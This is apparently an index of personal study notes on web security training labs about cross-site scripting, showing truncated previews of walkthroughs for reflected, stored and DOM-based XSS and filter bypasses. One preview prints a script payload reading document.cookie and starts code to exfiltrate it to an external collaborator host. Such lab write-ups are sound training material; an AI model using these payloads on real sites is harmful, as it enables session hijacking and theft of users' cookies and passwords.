
  • [xss] lab reflected xss with some svg markup allow 5bba34f8da88471eb958248fd2e9b0ff

    [XSS] Lab: Reflected XSS with some SVG markup allowed so since it allows SVG tags I just tried with the basic payload: lets use intruder to get all the tags that worked. we can use the window screen shot tool to extract the tags that passed then pass them again in a...

  • Labs 579d57ba482d4b10884e0c10204688d1

    LABS REFLECTED [XSS] Lab: [Reflected XSS]( into HTML context with nothing encoded [XSS] Lab: [Stored XSS]( into HTML context with nothing encoded [XSS] DOM XSS in document.write sink using source [[XSS] DOM XSS]( in document.write sink using source inside a select element [XSS] Lab: [DOM XSS]( in innerHTML sink using source [XSS] DOM XSS in jQuery anchor href attribute sink using source [XSS] DOM XSS in jQuery...

  • [xss] lab reflected xss into attribute with angle bebca9ada5c8413a9cfcf4ab358d444a

    [XSS] Lab: Reflected XSS into attribute with angle brackets HTML-encoded so lets begin by finding the context. Note: Whatever we search for is being added to a h1 tag in HTML surrounded by single quotes. not that we know that context let’s try to escape the value from the input tag first...

  • [xss] lab reflected xss into a javascript string w c2ab878dfc0e4958800e2f38617fdb81

    [XSS] Lab: Reflected XSS into a JavaScript string with a single quote and backslash escaped [encodeURIComponent() - JavaScript MDN]( so turns out that the  encodeURIComponent() function encodes a URI by replacing each instance of certain characters by one, two, three, or four escape sequences representing the UTF-8 encoding of the character so we can use a single...

  • [xss] lab reflected xss into html context with not e00fcb3ef86e45548e4e3fc06bebf10c

    [XSS] Lab: Reflected XSS into HTML context with nothing encoded First lets visit the site and test for any possible XSS vulnerabilities. we can already see when opening the site that this is a possible reflected XSS vulnerability since it is common for web apps to echo the searched term as we...

  • [xss] lab reflected xss into html context with mos 75a9bee8a8574109a02e68fc92d546d9

    [XSS] Lab: Reflected XSS into HTML context with most tags and attributes blocked since we have a search box lets insert a canary and look for where it appears in the source/DOM. by injecting a comment sequence we can see that we’re able to inject a comment sequence. since this...

  • Lab reflected xss into a template literal with ang d29d19db42be4bef831d2f4393310fdf

    Lab: Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped after making a search we can see a as we can see what ever our search term is is being reflected inside of the string literal. and using ${funciton} will execute javascript without escaping the...

  • [xss] lab exploiting cross Site scripting to steal c7460569095645e4911bbe798bd70588

    [XSS] Lab: Exploiting cross-site scripting to steal cookies all other fields are filtered but in the comment filed we can inject since we were able to inject <script> alert(document.cookie); </script> but since we need to exfiltrate the cookie we can use a variable and burp collaborator. <script> var ckie = document.cookie let...

  • [xss] lab reflected xss with event handlers and hr 30c175830d9c4726b6106abb9d3a3dc1

    [XSS] Lab: Reflected XSS with event handlers and href attributes blocked so injecting a vector means using tags like but I'm still going to use intruder to get a full list of the supported tags. so we can see we already have two tags with a 200:

  • [xss] lab exploiting cross Site scripting to captu 5834229c301f406d8341706c2d8e6c69

    [XSS] Lab: Exploiting cross-site scripting to capture passwords